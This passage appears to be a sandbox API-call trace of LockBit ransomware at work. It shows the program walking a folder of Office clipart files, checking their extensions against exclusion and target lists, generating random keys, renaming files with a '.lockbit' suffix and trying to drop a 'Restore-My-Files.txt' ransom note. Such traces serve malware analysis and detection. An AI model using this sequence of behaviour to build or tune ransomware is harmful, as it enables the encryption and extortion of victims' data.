(lpString1=".sdb", lpString2=".WMF") returned -1 [0179.324] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0179.324] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0179.324] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0179.324] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0179.324] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0179.324] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0179.324] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00241_.WMF.lockbit") returned 72 [0179.324] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00241_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\tn00241_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0179.325] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0179.325] malloc (_Size=0x40068) returned 0x1ff1e60 [0179.326] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=3980) returned 1 [0179.326] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.326] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.326] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0179.326] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.327] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.327] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0179.327] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0179.331] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00241_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00241_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0179.331] malloc (_Size=0xa6) returned 0x1fa2ed8 [0179.331] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0179.333] free (_Block=0x1fa2ed8) [0179.333] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00241_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0179.333] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0179.333] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0179.333] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e038d00, ftCreationTime.dwHighDateTime=0x1bd4ae3, ftLastAccessTime.dwLowDateTime=0x6d4fb570, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6e038d00, ftLastWriteTime.dwHighDateTime=0x1bd4ae3, nFileSizeHigh=0x0, nFileSizeLow=0xf74, dwReserved0=0x0, dwReserved1=0x0, cFileName="TN00246_.WMF", cAlternateFileName="")) returned 1 [0179.333] lstrcmpiW (lpString1=".", lpString2="TN00246_.WMF") returned -1 [0179.333] lstrcmpiW (lpString1="..", lpString2="TN00246_.WMF") returned -1 [0179.333] PathFindExtensionW (pszPath="TN00246_.WMF") returned=".WMF" [0179.333] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0179.333] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0179.333] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0179.333] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0179.334] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0179.334] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0179.334] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0179.334] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0179.334] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0179.334] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0179.334] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0179.334] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0179.334] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0179.334] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0179.334] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0179.334] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0179.334] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0179.334] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0179.334] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0179.334] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0179.334] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0179.334] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0179.334] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0179.334] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0179.334] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0179.334] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0179.334] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0179.335] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0179.335] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0179.335] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0179.335] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0179.335] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0179.335] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0179.335] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0179.335] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0179.335] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0179.335] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0179.335] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0179.335] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0179.335] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0179.335] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0179.335] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0179.335] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0179.335] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0179.335] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0179.335] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0179.335] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0179.335] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="TN00246_.WMF") returned -1 [0179.335] lstrcmpiW (lpString1="ntldr", lpString2="TN00246_.WMF") returned -1 [0179.336] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="TN00246_.WMF") returned -1 [0179.336] lstrcmpiW (lpString1="bootsect.bak", lpString2="TN00246_.WMF") returned -1 [0179.336] lstrcmpiW (lpString1="autorun.inf", lpString2="TN00246_.WMF") returned -1 [0179.336] lstrcmpiW (lpString1="thumbs.db", lpString2="TN00246_.WMF") returned -1 [0179.336] lstrcmpiW (lpString1="iconcache.db", lpString2="TN00246_.WMF") returned -1 [0179.336] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0179.336] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00246_.WMF") returned=".WMF" [0179.336] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0179.336] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0179.336] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0179.336] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0179.336] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0179.336] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0179.336] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0179.336] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0179.336] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0179.336] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0179.336] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0179.336] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0179.336] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0179.336] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0179.336] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0179.336] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0179.337] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0179.337] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0179.337] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0179.337] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0179.337] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0179.337] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0179.337] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0179.337] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0179.337] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0179.337] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0179.337] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0179.337] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0179.337] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00246_.WMF.lockbit") returned 72 [0179.337] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00246_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\tn00246_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0179.338] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0179.338] malloc (_Size=0x40068) returned 0x3df0008 [0179.338] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=3956) returned 1 [0179.339] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.339] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.339] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0179.339] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.340] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.340] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0179.340] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0179.346] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00246_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00246_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0179.346] malloc (_Size=0xa6) returned 0x1fa2ed8 [0179.346] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0179.347] free (_Block=0x1fa2ed8) [0179.347] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00246_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0179.347] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0179.347] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0179.348] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6cd26000, ftCreationTime.dwHighDateTime=0x1bd4ae3, ftLastAccessTime.dwLowDateTime=0x5ae692f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6cd26000, ftLastWriteTime.dwHighDateTime=0x1bd4ae3, nFileSizeHigh=0x0, nFileSizeLow=0x15bc, dwReserved0=0x0, dwReserved1=0x0, cFileName="TN00253_.WMF", cAlternateFileName="")) returned 1 [0179.348] lstrcmpiW (lpString1=".", lpString2="TN00253_.WMF") returned -1 [0179.348] lstrcmpiW (lpString1="..", lpString2="TN00253_.WMF") returned -1 [0179.348] PathFindExtensionW (pszPath="TN00253_.WMF") returned=".WMF" [0179.348] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0179.348] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0179.348] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0179.348] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0179.348] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0179.348] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0179.348] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0179.348] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0179.348] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0179.348] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0179.348] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0179.348] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0179.348] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0179.348] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0179.349] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0179.349] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0179.349] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0179.349] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0179.349] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0179.349] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0179.349] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0179.349] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0179.349] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0179.349] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0179.349] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0179.349] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0179.349] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0179.349] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0179.349] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0179.349] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0179.349] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0179.349] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0179.349] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0179.349] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0179.349] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0179.350] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0179.350] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0179.350] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0179.350] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0179.350] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0179.350] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0179.350] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0179.350] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0179.350] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0179.350] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0179.350] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0179.350] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0179.350] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="TN00253_.WMF") returned -1 [0179.350] lstrcmpiW (lpString1="ntldr", lpString2="TN00253_.WMF") returned -1 [0179.350] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="TN00253_.WMF") returned -1 [0179.350] lstrcmpiW (lpString1="bootsect.bak", lpString2="TN00253_.WMF") returned -1 [0179.350] lstrcmpiW (lpString1="autorun.inf", lpString2="TN00253_.WMF") returned -1 [0179.350] lstrcmpiW (lpString1="thumbs.db", lpString2="TN00253_.WMF") returned -1 [0179.350] lstrcmpiW (lpString1="iconcache.db", lpString2="TN00253_.WMF") returned -1 [0179.350] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0179.351] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00253_.WMF") returned=".WMF" [0179.351] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0179.351] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0179.351] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0179.351] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0179.351] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0179.351] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0179.351] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0179.351] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0179.351] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0179.351] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0179.351] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0179.351] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0179.351] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0179.351] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0179.351] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0179.351] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0179.351] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0179.351] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0179.351] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0179.351] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0179.352] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0179.352] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0179.352] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0179.352] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0179.352] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0179.352] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0179.352] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0179.352] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0179.352] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00253_.WMF.lockbit") returned 72 [0179.352] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00253_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\tn00253_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0179.353] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0179.354] malloc (_Size=0x40068) returned 0x3e70008 [0179.354] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=5564) returned 1 [0179.355] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.355] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.355] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0179.355] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.356] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.356] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0179.356] ReadFile (in: hFile=0x3cc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0179.360] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00253_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00253_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0179.360] malloc (_Size=0xa6) returned 0x1fa2ed8 [0179.360] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0179.362] free (_Block=0x1fa2ed8) [0179.362] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00253_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0179.362] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0179.362] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0179.362] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64d4200, ftCreationTime.dwHighDateTime=0x1bd4ae3, ftLastAccessTime.dwLowDateTime=0x6d4fb570, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x64d4200, ftLastWriteTime.dwHighDateTime=0x1bd4ae3, nFileSizeHigh=0x0, nFileSizeLow=0x1da8, dwReserved0=0x0, dwReserved1=0x0, cFileName="TN00255_.WMF", cAlternateFileName="")) returned 1 [0179.362] lstrcmpiW (lpString1=".", lpString2="TN00255_.WMF") returned -1 [0179.362] lstrcmpiW (lpString1="..", lpString2="TN00255_.WMF") returned -1 [0179.362] PathFindExtensionW (pszPath="TN00255_.WMF") returned=".WMF" [0179.362] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0179.363] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0179.363] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0179.363] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0179.363] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0179.363] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0179.363] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0179.363] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0179.363] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0179.363] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0179.363] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0179.363] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0179.363] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0179.363] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0179.363] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0179.363] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0179.363] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0179.363] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0179.363] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0179.363] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0179.363] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0179.363] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0179.363] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0179.364] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0179.364] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0179.364] lstrcmpiW 